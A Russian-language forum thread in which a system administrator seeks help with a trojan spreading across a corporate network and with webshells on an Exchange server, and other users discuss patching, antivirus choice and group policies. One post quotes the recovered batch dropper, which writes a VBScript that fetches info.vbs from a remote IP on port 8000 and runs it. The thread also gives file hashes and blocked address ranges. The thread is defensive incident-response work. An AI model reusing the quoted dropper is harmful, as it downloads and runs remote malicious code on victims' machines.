Заражение корпоративной сети: зловред Trojan.Multi.GenAutorunWMI.с (или .a), он же HEUR:Trojan.Multi.GenAutorunSvc.ksws, он же PowerShellMulDrop.129/PowerShellDownLoader.1452

[Burila]

11 часов назад, mike 1 сказал:

Очевидно, что через уязвимости и патчи безопасности лучше ставить все доступные, а не несколько патчей. 

 

Использовать подходящее решение для корпоративной среды, а не домашний антивирус, который не имеет централизованного управления и единых политик безопасности. Включить UAC, отобрать у юзеров права администратора. 

 

Начать с установки корпоративного антивируса. Если сеть большая, то лучше KES. 

При всём уважении, конкретно наш с Вами диалог приобретает странный характер. 

 

По поводу патчей - на подавляющем большинстве компьютеров, которые оказались под первой волной атаки, стояли все доступные
обновления по состоянию на конец 2020 года. 

Я предположил, что используются уязвимости, исправляемые патчами от 2017 и 2019 года.
Есть подозрение, что они уже установлены в системе, если в конце 2020 года после выкачки и установки всего предлагаемого при
очередной попытке обновится Центр обновления Windows пишет "Windows не требуется обновление".

 

Но я решил перестраховаться и вручную продублировать установку этих патчей, потому что тот же патч MS17-010 содержится в
обновлениях Windows под номерами 4012212, 4012215, 4012218, 4015549, 4015552, 4019263, 4019264, 4019265, 4022722, 4022168,
4012218, 4015552, 4019265, 4022168 - искать нужный номер в системе не то что глазами, а даже командами "& wmic qfe get hotfixid |
find" - дело неблагодарное, т.к. насколько я понимаю, это неполный перечень, указанный на сайте Microsoft,.

 

По поводу администраторских прав - они только у администраторов. У остальных - пользовательские.

 

Централизованное управление - это прекрасно. И антивирус у нас используется корпоративный, но от другого производителя. Он не
помог.
Более того, антивирус Каspersky Security for Windows Server, который тоже относится к классу корпоративных, не смог обеспечить
защиту серверов, на который установлен - подробности в моих сообщениях выше.

 

Я максимально подробно стараюсь описывать поведение вируса, машин, проводимых действий, результаты, дисциплинировано выполняю то,
о чем меня просят, прикладывая логи - потому что советуюсь со специалистами, которые, как предполагал, обитают на этом форуме. 

 

Мне интересно докопаться до сути - выяснить причины, способы распространения и борьбы со зловредом. Если найденное решение поможет
еще кому-то, вообще будет замечательно.

 

Я отдаю себе отчет, что здесь никто никому ничего не должен, но прихожу в некое изумление, когда получаю рекомендации формата
"поменяйте один антивирус Касперского на другой антивирус Касперского, а то у вас централизованного управления нет" и "это всё
потому что у вас обновления не стоят". Не надо так, пожалуйста.

 

Борьба с подобными зловредами - это комплекс мер, как антивирусных, так и организационных, поэтому волшебной пилюли не
предвидится.

4 часа назад, Андрей_mon сказал:

У нас аналогичная проблема.

Для решения запретили выполнение Powershell политиками, но от пользователя "система" он все равно запускается

я так понял, что с каждого компьютера в скрипте powershell запускается сканирование портов 135-139 и 445 по всем адресам класса С, таким образом он распространяется

Думаю, что надо блокировать входящие порты, чтобы он не распространялся далее и убивать процессы powershell.exe и schtasks.exe

Если будет какое-то действенное решение - отпишусь здесь. Буду рад выслушать советы 

Кстати, страдают компьютеры на Windows 7, Server 2012, и Win10, где по каким то причинам был выключен MS Defender

По идее, если блокировка указана для раздела "Компьютер", то и "система" не должна запускать скрипты. 

[Burila]

31.08.2021 в 13:26, Burila сказал:

@echo on error resume next>%windir%\11.vbs&
    @echo Set ox=CreateObject^("MSXML2.XMLHTTP"^)>>%windir%\11.vbs&
    @echo ox.open "GET","http://45.10.69.139:8000/info.vbs",false>>%windir%\11.vbs&
    @echo ox.send^(^)>>%windir%\11.vbs&
    @echo If ox.Status=200 Then>>%windir%\11.vbs&
    @echo Set oas=CreateObject^("ADODB.Stream"^)>>%windir%\11.vbs&
    @echo oas.Open>>%windir%\11.vbs&
    @echo oas.Type=1 >>%windir%\11.vbs&
    @echo oas.Write ox.ResponseBody>>%windir%\11.vbs&
    @echo oas.SaveToFile "%windir%\info.vbs",2 >>%windir%\11.vbs&
    @echo oas.Close>>%windir%\11.vbs&
    @echo End if>>%windir%\11.vbs&
    @echo Set os=CreateObject^("WScript.Shell"^)>>%windir%\11.vbs&
    @echo os.Exec^("cscript.exe %windir%\info.vbs"^)>>%windir%\11.vbs&
    cscript.exe %windir%\11.vbs

В тексте bat-вредоноса фигурирует использование VBScript и сценариев PowerShell.

Было принято решение через групповые политики (разделы "Компьютеры" и "Пользователи") заблокировать следующее:

*.js
*.ps1
*.vbs
*.wsc
*.wsf
*.wsh

На одном из компьютеров запустили тестовый скрипт ps1 (создание папки), на что получили ответ о запрете со стороны GPO.

Будем наблюдать дальше.

 

[mike 1]

10 часов назад, Burila сказал:

По поводу патчей - на подавляющем большинстве компьютеров, которые оказались под первой волной атаки, стояли все доступные
обновления по состоянию на конец 2020 года.

Windows 7 вообще уже завершила свою поддержку еще в январе 2020 года. Есть конечно платные обновления, но сомневаюсь, что у вас есть подписка. 

 

10 часов назад, Burila сказал:

Централизованное управление - это прекрасно. И антивирус у нас используется корпоративный

Какого?

 

10 часов назад, Burila сказал:

Централизованное управление - это прекрасно. И антивирус у нас используется корпоративный, но от другого производителя. Он не
помог.
Более того, антивирус Каspersky Security for Windows Server, который тоже относится к классу корпоративных, не смог обеспечить
защиту серверов, на который установлен - подробности в моих сообщениях выше.

Смог. Хотя бы потому что нагрузки нет на ЦП, а оповещения о том, что найдена и удалена угроза говорят о том, что защита все таки работает. 

 

10 часов назад, Burila сказал:

Я отдаю себе отчет, что здесь никто никому ничего не должен, но прихожу в некое изумление, когда получаю рекомендации формата
"поменяйте один антивирус Касперского на другой антивирус Касперского, а то у вас централизованного управления нет" и "это всё
потому что у вас обновления не стоят".

Мы ничего не знаем о вашей корпоративной сети. Может у вас вообще банально в AD бардак (скомпрометирована УЗ контроллера домена, либо еще хуже есть лишние УЗ)?  А как вы хотели без централизованного управления лечить целые сегменты сети? Хотя есть решение: заблокировать сегмент сети, пролечить, а потом разблокировать. На всякий случай сразу скажу: я и Тирекс не являемся сотрудниками ЛК, а то некоторые думают иначе.  

Изменено 1 сентября, 2021 пользователем mike 1

[Burila]

11 часов назад, mike 1 сказал:

Какого?

Считай никакого - Symantec))

11 часов назад, mike 1 сказал:

Windows 7 вообще уже завершила свою поддержку еще в январе 2020 года. Есть конечно платные обновления, но сомневаюсь, что у вас есть подписка. 

Подписки нет. Поддержка Windows 7 закончена в начале 2020 года. По состоянию на конец 2020 на подавляющем количестве компьютеров, попавших под первую волну заражения, в центре обновления было указано "Windows не требуется обновление". Из чего можно предполагать, что все обновления до января 2020 года уже установлены на машинах. Но, на всякий случай, конкретные патчи от 2017 и 2019 года установили "вручную".

12 часов назад, mike 1 сказал:

Смог. Хотя бы потому что нагрузки нет на ЦП, а оповещения о том, что найдена и удалена угроза говорят о том, что защита все таки работает

Попытки режет, загрузки ЦП нет - за это ему большое спасибо, без шуток.

Но он же не решает проблему на 100% - активность вируса сохраняется, значит остались в системе какие-то ключи, задачи, на текущий момент находящиеся вне поля моего внимания.

Я полностью согласен с тем, что для корпоративных сред нужны корпоративные инструменты. И в планах у меня после решения данной задачи поднять вопрос о приобретении того KES. 

Но сейчас мы работаем с тем, что есть. 

И помимо антивируса необходимо сделать еще ряд вещей.

А вот каких именно - тут нужен совет, для этого тут и пишу простыни.

Плюс, возможно, выработанный алгоритм потом пригодится еще кому-нибудь.

12 часов назад, mike 1 сказал:

Мы ничего не знаем о вашей корпоративной сети

Я открыт для диалога и дисциплинирован в плане выполнения разумных рекомендаций. Если для диагностики нужны еще какие-то дополнительные данные - скажите какие.

[Burila]

Новые вводные:

 

Вчера вечером выяснилось, что на почтовом сервере (Windows Server 2021 R2) с Exchange автоматическая настройка обновлений не настроена и обновления вообще не стоят.

Плюс сообщения о вирусах в журнале безопасности "Касперский для серверов".

Ответственные лица своё уже получили, но факт остаётся фактом.

Обновления за ночь выкачались.

Каспер пишет про два вида троянов:

• HEUR:Backdoor.MSIL.Webshell.gen.
• HEUR:Exploit.Script.CVE-2021-26855.gen..

Блок сообщений в журнале появляется каждые три часа:

 

Обнаружен возможно зараженный объект: Троянская программа HEUR:Exploit.Script.CVE-2021-26855.gen.
Имя объекта: log.aspx 
MD5 хеш файла: f0520236bf9c8c73f199a244d029a49f
Хеш SHA256 файла: 264f9bf852f2c00eb804050861da39b78c1720dc5f77e08dc484dde0a85430eb

 

Обнаружен возможно зараженный объект: Троянская программа HEUR:Exploit.Script.CVE-2021-26855.gen.
Имя объекта: RXT7WB.aspx 
MD5 хеш файла: c2b67fb32ef0953722ea437295be386b
Хеш SHA256 файла: b4d02ac0e79ca6376416f52c30a82d8b72efcb8966640f3dbf5b22f67e6075b9

 

Обнаружен возможно зараженный объект: Троянская программа HEUR:Exploit.Script.CVE-2021-26855.gen.
Имя объекта: dgFfuh.aspx 
MD5 хеш файла: 0418b10fdf926066fa6a19e83332e34e
Хеш SHA256 файла: 59720c4ae289ab2a8336a1cd24fbfb2a24478e1ed88d517725999751e510b97a

 

Обнаружен возможно зараженный объект: Троянская программа HEUR:Exploit.Script.CVE-2021-26855.gen.
Имя объекта: 7r3q2.aspx 
MD5 хеш файла: dbb0576553870e07f8220386b5989cdb
Хеш SHA256 файла: 6377ada51e66550bafda31038897ed13be71f928dabbefd657a1d3b8be672237

 

Обнаружен возможно зараженный объект: Троянская программа HEUR:Exploit.Script.CVE-2021-26855.gen.
Имя объекта: log.aspx 
MD5 хеш файла: f0520236bf9c8c73f199a244d029a49f
Хеш SHA256 файла: 264f9bf852f2c00eb804050861da39b78c1720dc5f77e08dc484dde0a85430eb

 

Обнаружен возможно зараженный объект: Троянская программа HEUR:Exploit.Script.CVE-2021-26855.gen.
Имя объекта: r0ZDr.aspx 
MD5 хеш файла: 03e3f3f6af9eb4776ae8c6347d0ffef5
Хеш SHA256 файла: f34bed88de7cfed72348d3cc2c9367b268c1a12807836aed904fcb79036e2447

 

Обнаружен возможно зараженный объект: Троянская программа HEUR:Exploit.Script.CVE-2021-26855.gen.
Имя объекта: p7jv8.aspx 
MD5 хеш файла: fed13a216017262630c82d04a81ee2ef
Хеш SHA256 файла: 16dda25ce8b81644c17f024819337246b9d971140529bc31b5a163ef061a08fe

 

Обнаружен возможно зараженный объект: Троянская программа HEUR:Backdoor.MSIL.Webshell.gen.
Имя объекта: App_Web_r0zdr.aspx.f5dba9b9.d7wo2roq.dll 
MD5 хеш файла: e91aa8fb8225d5e019311d67774f1946
Хеш SHA256 файла: e3614efab364abe01dd98d92e61d6a73decc9ad87e9d6ce14059581e4ca4ccc2

На текущий момент в двух филиалов с клиентскими машинами и серверами проведены следующие работы:

• Групповыми политиками в разделах "Компьютер" и "Пользователь" запрещено выполнение .js, .ps1, .vbs, .wsc, .wsf, .wsh
• На пограничных с интернетом устройствах запрещены обращение извне на порт 8000 и адреса из диапазона 23.236.64.0-23.236.79.255 45.10.0.0 - 45.10.255.255
• Антивирусная проверка: сначала утилитами Drweb CurIT, KVRT, после проведения работ - установленным Касперским
• Установлены все возможные обновления ОС. Патчи CVE-2019-0859 и MS17-010 ставились вручную.
• Сменен пароль локального админа, для каждого филиала свой, различается для клиентов и серверов
• Очищены папки C:\Windows\Temp и c:\Users\%username\AppData\Local\Temp\
• Очищены точки восстановления

За последние два дня вирусной активности в логах на машинах в этих филиалах (кроме почтового сервера) не отмечено.

 

В планах:

• запустить на машинах autoruns (sysinternals), проверить/почистить автозагрузку - на некоторых хостах был прописан sysupdater0.bat
• разобраться с вирями на почтовике - есть подозрение, что атака была начата с него
• Сменить пароль доменного администратора, провести ревизию заведенных учёток доменных пользователей
• Добавить в запрет групповыми политиками (разделы "Компьютер" и "Пользователь") выполнение .bat, .jse, .pif, .scr. Внести данные изменения не только в политике домена, но и на машинах, которые в домен не входят. 
• По-хорошему, выяснить бы какие следы на машинах оставил зловред и как эти следы казнить.

 

[mike 1]

02.09.2021 в 09:14, Burila сказал:

Подписки нет. Поддержка Windows 7 закончена в начале 2020 года. По состоянию на конец 2020 на подавляющем количестве компьютеров, попавших под первую волну заражения, в центре обновления было указано "Windows не требуется обновление". Из чего можно предполагать, что все обновления до января 2020 года уже установлены на машинах.

За 1,5 года думаете новых дыр в Windows 7 не появилось? Задумайтесь о переходе на Windows 10. Кстати, через тот же KSC этот процесс можно автоматизировать. 

 

02.09.2021 в 13:36, Burila сказал:

HEUR:Exploit.Script.CVE-2021-26855.gen..

Ставьте патчи на Exchange. https://www.securitylab.ru/blog/company/spyse/350540.php 

 

 

02.09.2021 в 13:36, Burila сказал:

По-хорошему, выяснить бы какие следы на машинах оставил зловред и как эти следы казнить.

Аудит ИТ инфраструктуры вам по хорошему следует провести. 

 

02.09.2021 в 09:14, Burila сказал:

Я открыт для диалога и дисциплинирован в плане выполнения разумных рекомендаций. Если для диагностики нужны еще какие-то дополнительные данные - скажите какие.

У меня к сожалению в связи со сменой работы очень мало свободного времени.